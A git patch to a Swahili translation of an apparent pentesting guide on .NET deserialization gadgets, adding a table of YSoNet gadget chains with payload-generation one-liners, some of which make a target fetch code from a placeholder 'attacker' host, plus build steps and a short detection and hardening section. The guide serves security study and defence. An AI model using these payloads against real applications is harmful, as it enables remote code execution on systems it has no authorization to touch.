From f0666d9eb436824689ab2be42816f5b083ed2290 Mon Sep 17 00:00:00 2001 From: Translator Date: Tue, 29 Jul 2025 10:13:00 +0000 Subject: [PATCH] Translated ['src/pentesting-web/deserialization/basic-.net-deserializati --- ...er-gadgets-expandedwrapper-and-json.net.md | 57 +++++++++++++++++-- 1 file changed, 51 insertions(+), 6 deletions(-) diff --git a/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md b/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md index 9e1cf6155..2045998ae 100644 --- a/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md +++ b/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md @@ -1,4 +1,4 @@ -# Msingi wa .Net deserialization (gadget ya ObjectDataProvider, ExpandedWrapper, na Json.Net) +# Msingi wa .Net deserialization (Gadget ya ObjectDataProvider, ExpandedWrapper, na Json.Net) {{#include ../../banners/hacktricks-training.md}} @@ -30,7 +30,7 @@ Kumbuka kwamba mwishoni mwa msimbo inaita `this.QueryWorke(null)`. Hebu tuone in ![](<../../images/image (596).png>) -Kumbuka kwamba hii si msimbo kamili wa kazi ya `QueryWorker` lakini inaonyesha sehemu ya kuvutia: Msimbo **unaita `this.InvokeMethodOnInstance(out ex);`** hii ndiyo mistari ambapo **seti ya njia inaitwa**. +Kumbuka kwamba hii si msimbo kamili wa kazi ya `QueryWorker` lakini inaonyesha sehemu ya kuvutia ya hiyo: Msimbo **unaita `this.InvokeMethodOnInstance(out ex);`** hii ndiyo mistari ambapo **seti ya njia inaitwa**. Ikiwa unataka kuangalia kwamba kwa kuweka tu _**MethodName**_** itatekelezwa**, unaweza kukimbia msimbo huu: ```java @@ -56,9 +56,9 @@ Kumbuka kwamba unahitaji kuongeza kama rejeleo _C:\Windows\Microsoft.NET\Framewo ## ExpandedWrapper -Kwa kutumia exploit iliyotangulia kutakuwa na kesi ambapo **kitu** kitakuwa **kimeondolewa** kama _**ObjectDataProvider**_ mfano (kwa mfano katika DotNetNuke vuln, kwa kutumia XmlSerializer, kitu kiliondolewa kwa kutumia `GetType`). Hivyo, hakutakuwa na **ufahamu wa aina ya kitu kilichofichwa** katika mfano wa _ObjectDataProvider_ (`Process` kwa mfano). Unaweza kupata [maelezo zaidi kuhusu DotNetNuke vuln hapa](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1). +Kwa kutumia exploit iliyotangulia kutakuwa na kesi ambapo **kitu** kitakuwa **kimeondolewa** kama _**ObjectDataProvider**_ mfano (kwa mfano katika DotNetNuke vuln, kwa kutumia XmlSerializer, kitu kiliondolewa kwa kutumia `GetType`). Hivyo, hakutakuwa na **ufahamu wa aina ya kitu kilichofichwa** katika mfano wa _ObjectDataProvider_ (`Process` kwa mfano). Unaweza kupata zaidi [habari kuhusu DotNetNuke vuln hapa](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1). -Darasa hili linaruhusu **kueleza aina za vitu vya vitu vilivyofichwa** katika mfano fulani. Hivyo, darasa hili linaweza kutumika kuficha kitu cha chanzo (_ObjectDataProvider_) ndani ya aina mpya ya kitu na kutoa mali tunazohitaji (_ObjectDataProvider.MethodName_ na _ObjectDataProvider.MethodParameters_).\ +Darasa hili linaruhusu s**pecify aina za vitu vya vitu vilivyofichwa** katika mfano fulani. Hivyo, darasa hili linaweza kutumika kuficha kitu cha chanzo (_ObjectDataProvider_) ndani ya aina mpya ya kitu na kutoa mali tunazohitaji (_ObjectDataProvider.MethodName_ na _ObjectDataProvider.MethodParameters_).\ Hii ni muhimu sana kwa kesi kama ile iliyowasilishwa hapo awali, kwa sababu tutakuwa na uwezo wa **kuficha \_ObjectDataProvider**_** ndani ya mfano wa **_**ExpandedWrapper** \_ na **wakati wa kuondolewa** darasa hili litaunda _**OjectDataProvider**_ kitu ambacho kitafanya **kazi** iliyoonyeshwa katika _**MethodName**_. Unaweza kuangalia wrapper hii kwa kutumia msimbo ufuatao: @@ -85,11 +85,11 @@ myExpWrap.ProjectedProperty0.MethodName = "Start"; ``` ## Json.Net -Katika [ukurasa rasmi](https://www.newtonsoft.com/json) inaonyeshwa kwamba maktaba hii inaruhusu **Kuhifadhi na kufungua tena kitu chochote cha .NET kwa kutumia serializer wa JSON wenye nguvu wa Json.NET**. Hivyo, ikiwa tunaweza **kufungua tena gadget ya ObjectDataProvider**, tunaweza kusababisha **RCE** kwa kufungua tena kitu. +Katika [ukurasa rasmi](https://www.newtonsoft.com/json) inabainishwa kwamba maktaba hii inaruhusu **Kuhifadhi na kufungua tena kitu chochote cha .NET kwa kutumia serializer wa JSON wenye nguvu wa Json.NET**. Hivyo, ikiwa tunaweza **kufungua tena gadget ya ObjectDataProvider**, tunaweza kusababisha **RCE** kwa kufungua tena kitu. ### Mfano wa Json.Net -Kwanza kabisa hebu tuone mfano wa jinsi ya **kuhifadhi/kufungua tena** kitu kwa kutumia maktaba hii: +Kwanza kabisa, hebu tuone mfano wa jinsi ya **kuhifadhi/kufungua tena** kitu kwa kutumia maktaba hii: ```java using System; using Newtonsoft.Json; @@ -184,4 +184,49 @@ TypeNameHandling = TypeNameHandling.Auto } } ``` +## Advanced .NET Gadget Chains (YSoNet & ysoserial.net) + +Teknolojia ya ObjectDataProvider + ExpandedWrapper iliyotambulishwa hapo juu ni moja tu ya MIFUMO MINGI ya gadget ambazo zinaweza kutumika vibaya wakati programu inafanya **deserialization isiyo salama ya .NET**. Zana za kisasa za red-team kama **[YSoNet](https://github.com/irsdl/ysonet)** (na ya zamani [ysoserial.net](https://github.com/pwntester/ysoserial.net)) zinaweza kuunda **grafu za vitu vya uhalifu zenye matumizi tayari** kwa mamia ya gadgets na muundo wa serialization. + +Hapa chini kuna rejeleo lililokandamizwa la mnyororo wa gadgets wenye manufaa zaidi uliotolewa na *YSoNet* pamoja na maelezo ya haraka ya jinsi yanavyofanya kazi na amri za mfano za kuzalisha payloads. + +| Gadget Chain | Key Idea / Primitive | Common Serializers | YSoNet one-liner | +|--------------|----------------------|--------------------|------------------| +| **TypeConfuseDelegate** | Inaharibu rekodi ya `DelegateSerializationHolder` ili, mara itakapoundwa, delegate iwe inarejelea *yoyote* njia iliyotolewa na mshambuliaji (mfano `Process.Start`) | `BinaryFormatter`, `SoapFormatter`, `NetDataContractSerializer` | `ysonet.exe TypeConfuseDelegate "calc.exe" > payload.bin` | +| **ActivitySurrogateSelector** | Inatumia `System.Workflow.ComponentModel.ActivitySurrogateSelector` ili *kuepuka uainishaji wa aina za .NET ≥4.8* na moja kwa moja kuita **kijenga** cha darasa lililotolewa au **kuandika** faili ya C# papo hapo | `BinaryFormatter`, `NetDataContractSerializer`, `LosFormatter` | `ysonet.exe ActivitySurrogateSelectorFromFile ExploitClass.cs;System.Windows.Forms.dll > payload.dat` | +| **DataSetOldBehaviour** | Inatumia uwakilishi wa **XML wa zamani** wa `System.Data.DataSet` ili kuunda aina zisizo na mipaka kwa kujaza maeneo ya `` / `` (kwa hiari ikifanya uongo wa assembly kwa `--spoofedAssembly`) | `LosFormatter`, `BinaryFormatter`, `XmlSerializer` | `ysonet.exe DataSetOldBehaviour "" --spoofedAssembly mscorlib > payload.xml` | +| **GetterCompilerResults** | Katika mazingira ya WPF (> .NET 5) inafunga getters za mali hadi kufikia `System.CodeDom.Compiler.CompilerResults`, kisha *inaandika* au *inaongeza* DLL iliyotolewa na `-c` | `Json.NET` isiyo na aina, `MessagePack` isiyo na aina | `ysonet.exe GetterCompilerResults -c Loader.dll > payload.json` | +| **ObjectDataProvider** (review) | Inatumia WPF `System.Windows.Data.ObjectDataProvider` kuita njia isiyo na mipaka ya static kwa hoja zilizo na udhibiti. YSoNet inaongeza toleo la `--xamlurl` la urahisi kuhost XAML mbaya kwa mbali | `BinaryFormatter`, `Json.NET`, `XAML`, *n.k.* | `ysonet.exe ObjectDataProvider --xamlurl http://attacker/o.xaml > payload.xaml` | +| **PSObject (CVE-2017-8565)** | Inajumuisha `ScriptBlock` ndani ya `System.Management.Automation.PSObject` inayotekelezwa wakati PowerShell inafanya deserialization ya kitu | PowerShell remoting, `BinaryFormatter` | `ysonet.exe PSObject "Invoke-WebRequest http://attacker/evil.ps1" > psobj.bin` | + +> [!TIP] +> Payload zote zina **andikwa kwenye *stdout*** kwa chaguo-msingi, na kufanya iwe rahisi kuzituma kwenye zana nyingine (mfano: ViewState generators, base64 encoders, HTTP clients). + +### Building / Installing YSoNet + +Ikiwa hakuna binaries zilizotengenezwa kabla zinapatikana chini ya *Actions ➜ Artifacts* / *Releases*, amri ifuatayo ya **PowerShell** itaunda mazingira ya kujenga, kunakili hifadhi na kuandika kila kitu katika *Release* mode: +```powershell +Set-ExecutionPolicy Bypass -Scope Process -Force; +[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; +iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1')); +choco install visualstudio2022community visualstudio2022-workload-nativedesktop msbuild.communitytasks nuget.commandline git --yes; + +git clone https://github.com/irsdl/ysonet +cd ysonet +nuget restore ysonet.sln +msbuild ysonet.sln -p:Configuration=Release +``` +The compiled `ysonet.exe` can then be found under `ysonet/bin/Release/`. + +### Detection & Hardening +* **Gundua** mchakato wa mtoto usiotarajiwa wa `w3wp.exe`, `PowerShell.exe`, au mchakato wowote unaofanya deserialization ya data iliyotolewa na mtumiaji (kwa mfano, `MessagePack`, `Json.NET`). +* Wezesha na **lazimisha uchujaji wa aina** (`TypeFilterLevel` = *Full*, `SurrogateSelector` ya kawaida, `SerializationBinder`, *n.k.*) kila wakati `BinaryFormatter` / `NetDataContractSerializer` ya zamani haiwezi kuondolewa. +* Pale inapowezekana hamasisha **`System.Text.Json`** au **`DataContractJsonSerializer`** na converters za msingi wa orodha nyeupe. +* Zuia maktaba hatari za WPF (`PresentationFramework`, `System.Workflow.*`) zisipakuliwe katika michakato ya wavuti ambazo hazipaswi kuzihitaji kamwe. + +## References +- [YSoNet – .NET Deserialization Payload Generator](https://github.com/irsdl/ysonet) +- [ysoserial.net – original PoC tool](https://github.com/pwntester/ysoserial.net) +- [Microsoft – CVE-2017-8565](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-8565) + {{#include ../../banners/hacktricks-training.md}}